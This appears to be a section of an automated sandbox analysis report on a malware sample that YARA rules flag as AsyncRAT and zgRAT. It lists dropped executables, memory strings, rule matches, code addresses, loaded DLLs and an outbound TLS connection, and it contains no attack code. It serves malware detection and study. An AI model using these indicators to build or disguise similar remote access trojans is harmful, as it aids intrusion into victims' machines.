Source: TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2126128459.000002341C8F0000.00000004.08000000.00040000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D0C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49794 version: TLS 1.2
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Window created: window name: CLIPBRDWNDCLASS

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Process information set: 01 00 00 00

System Summary

Source: dump.pcap, type: PCAP Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.9NBx4Vmiuj.exe.23435160000.14.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 3.2.RegSvcs.exe.1e3c92db520.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.2.RegSvcs.exe.1e3c92db520.4.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.btjxg.exe.13079ac0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.0.btjxg.exe.de0000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.btjxg.exe.13079ac0.1.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.9NBx4Vmiuj.exe.2342cd134c8.4.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.9NBx4Vmiuj.exe.2342cd134c8.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.9NBx4Vmiuj.exe.2342cc53458.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.9NBx4Vmiuj.exe.2342ce13500.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.9NBx4Vmiuj.exe.2342ce13500.5.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.9NBx4Vmiuj.exe.23435160000.14.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.9NBx4Vmiuj.exe.2342cc93490.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 00000003.00000002.3409147293.000001E3C92B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000004.00000002.3382459280.0000000013071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.2132514547.0000023435160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects zgRAT Author: ditekSHen
Source: 00000004.00000000.2204688783.0000000000DE2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\ProgramData\btjxg.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 9NBx4Vmiuj.exe, Program.cs Large array initialization: Main: array initializer size 641201
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Code function: 2_2_00007FF848A16FBD NtUnmapViewOfSection, 2_2_00007FF848A16FBD
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489B1AB1 0_2_00007FF8489B1AB1
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489B1BA9 0_2_00007FF8489B1BA9
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489B5B12 0_2_00007FF8489B5B12
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489B15A9 0_2_00007FF8489B15A9
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489B629D 0_2_00007FF8489B629D
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489B0848 0_2_00007FF8489B0848
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489B63A9 0_2_00007FF8489B63A9
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489B63E8 0_2_00007FF8489B63E8
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489B6331 0_2_00007FF8489B6331
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489B630E 0_2_00007FF8489B630E
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489B636D 0_2_00007FF8489B636D
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489B3CD3 0_2_00007FF8489B3CD3
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489B6421 0_2_00007FF8489B6421
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489B3BFB 0_2_00007FF8489B3BFB
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489B3C08 0_2_00007FF8489B3C08
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489B6477 0_2_00007FF8489B6477
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489B6457 0_2_00007FF8489B6457
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489B5593 0_2_00007FF8489B5593
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489B76AC 0_2_00007FF8489B76AC
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489B3F9D 0_2_00007FF8489B3F9D
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489B1793 0_2_00007FF8489B1793
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489B3FD3 0_2_00007FF8489B3FD3
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF848A81B44 0_2_00007FF848A81B44
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF848A83424 0_2_00007FF848A83424
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF848A82F10 0_2_00007FF848A82F10
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF848B60D41 0_2_00007FF848B60D41
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF848B61FFA 0_2_00007FF848B61FFA
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Code function: 2_2_00007FF8489B76AC 2_2_00007FF8489B76AC
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Code function: 2_2_00007FF8489B4000 2_2_00007FF8489B4000
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Code function: 2_2_00007FF8489ECAD0 2_2_00007FF8489ECAD0
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Code function: 2_2_00007FF8489E5628 2_2_00007FF8489E5628
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Code function: 2_2_00007FF8489E5648 2_2_00007FF8489E5648
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Code function: 2_2_00007FF8489E83F8 2_2_00007FF8489E83F8
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Code function: 2_2_00007FF8489E9CC0 2_2_00007FF8489E9CC0
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Code function: 2_2_00007FF8489B1AE6 2_2_00007FF8489B1AE6
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Code function: 2_2_00007FF8489B1BA9 2_2_00007FF8489B1BA9
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Code function: 2_2_00007FF848A06582 2_2_00007FF848A06582
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Code function: 2_2_00007FF848A111A8 2_2_00007FF848A111A8
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Code function: 2_2_00007FF8489F79ED 2_2_00007FF8489F79ED
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Code function: 2_2_00007FF848A057D6 2_2_00007FF848A057D6
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Code function: 2_2_00007FF8489F5849 2_2_00007FF8489F5849
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Code function: 2_2_00007FF848A81B44 2_2_00007FF848A81B44
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Code function: 2_2_00007FF848A82F10 2_2_00007FF848A82F10
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Code function: 2_2_00007FF848A83424 2_2_00007FF848A83424
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Code function: 2_2_00007FF848A83264 2_2_00007FF848A83264
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Code function: 3_2_00007FF8489D15A9 3_2_00007FF8489D15A9
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Code function: 3_2_00007FF8489D1AE6 3_2_00007FF8489D1AE6
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Code function: 3_2_00007FF8489D1BA9 3_2_00007FF8489D1BA9
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Code function: 3_2_00007FF8489D76AC 3_2_00007FF8489D76AC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Code function: 3_2_00007FF8489D3F9D 3_2_00007FF8489D3F9D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Code function: 3_2_00007FF8489D3FD3 3_2_00007FF8489D3FD3
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Code function: 3_2_00007FF8489D3CD3 3_2_00007FF8489D3CD3
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Code function: 3_2_00007FF8489D3BFB 3_2_00007FF8489D3BFB
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Code function: 3_2_00007FF8489D3C08 3_2_00007FF8489D3C08
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Code function: 3_2_00007FF848AA1B44 3_2_00007FF848AA1B44
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Code function: 3_2_00007FF848B713C1 3_2_00007FF848B713C1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Code function: 3_2_00007FF848B702FA 3_2_00007FF848B702FA
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Code function: 3_2_00007FF848B703FA 3_2_00007FF848B703FA
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Code function: 3_2_00007FF848B768BD 3_2_00007FF848B768BD
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Code function: 4_2_00007FF8489C05B0 4_2_00007FF8489C05B0
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Code function: 4_2_00007FF8489C8542 4_2_00007FF8489C8542
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Code function: 4_2_00007FF8489CDACD 4_2_00007FF8489CDACD
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Code function: 4_2_00007FF8489C7396 4_2_00007FF8489C7396
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FF848A7169D 5_2_00007FF848A7169D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FF848A730E9 5_2_00007FF848A730E9
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Code function: 7_2_00007FF8489C1AE6 7_2_00007FF8489C1AE6
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Code function: 7_2_00007FF8489C1BA9 7_2_00007FF8489C1BA9
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Code function: 7_2_00007FF8489C3CD3 7_2_00007FF8489C3CD3
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Code function: 7_2_00007FF8489C3BFA 7_2_00007FF8489C3BFA
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Code function: 7_2_00007FF8489C3C08 7_2_00007FF8489C3C08
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Code function: 7_2_00007FF8489C76AC 7_2_00007FF8489C76AC
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Code function: 7_2_00007FF8489C3F9D 7_2_00007FF8489C3F9D
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Code function: 7_2_00007FF8489C3FD3 7_2_00007FF8489C3FD3
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Code function: 7_2_00007FF848A91B58 7_2_00007FF848A91B58
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FF848A730E9 10_2_00007FF848A730E9
Source: TypeId.exe.0.dr Static PE information: No import functions for PE file found
Source: 9NBx4Vmiuj.exe Static PE information: No import functions for PE file found
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs 9NBx4Vmiuj.exe
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 9NBx4Vmiuj.exe
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342CE13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePjraflkwkhj.dll" vs 9NBx4Vmiuj.exe
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342CC3B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePjraflkwkhj.dll" vs 9NBx4Vmiuj.exe
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2126196926.000002341C991000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs 9NBx4Vmiuj.exe
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2133599279.0000023435360000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 9NBx4Vmiuj.exe
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2126128459.000002341C8F0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs 9NBx4Vmiuj.exe
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D24F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 9NBx4Vmiuj.exe
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2132514547.0000023435160000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamePjraflkwkhj.dll" vs 9NBx4Vmiuj.exe
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D0C8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs 9NBx4Vmiuj.exe
Source: 9NBx4Vmiuj.exe Binary or memory string: OriginalFilenameOzsekpshyu.exe" vs 9NBx4Vmiuj.exe
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Section loaded: taskschd.dll
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Section loaded: xmllite.dll
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Section loaded: sxs.dll
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Section loaded: taskschd.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: scrrun.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: avicap32.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: msvfw32.dll
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Section loaded: winmm.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
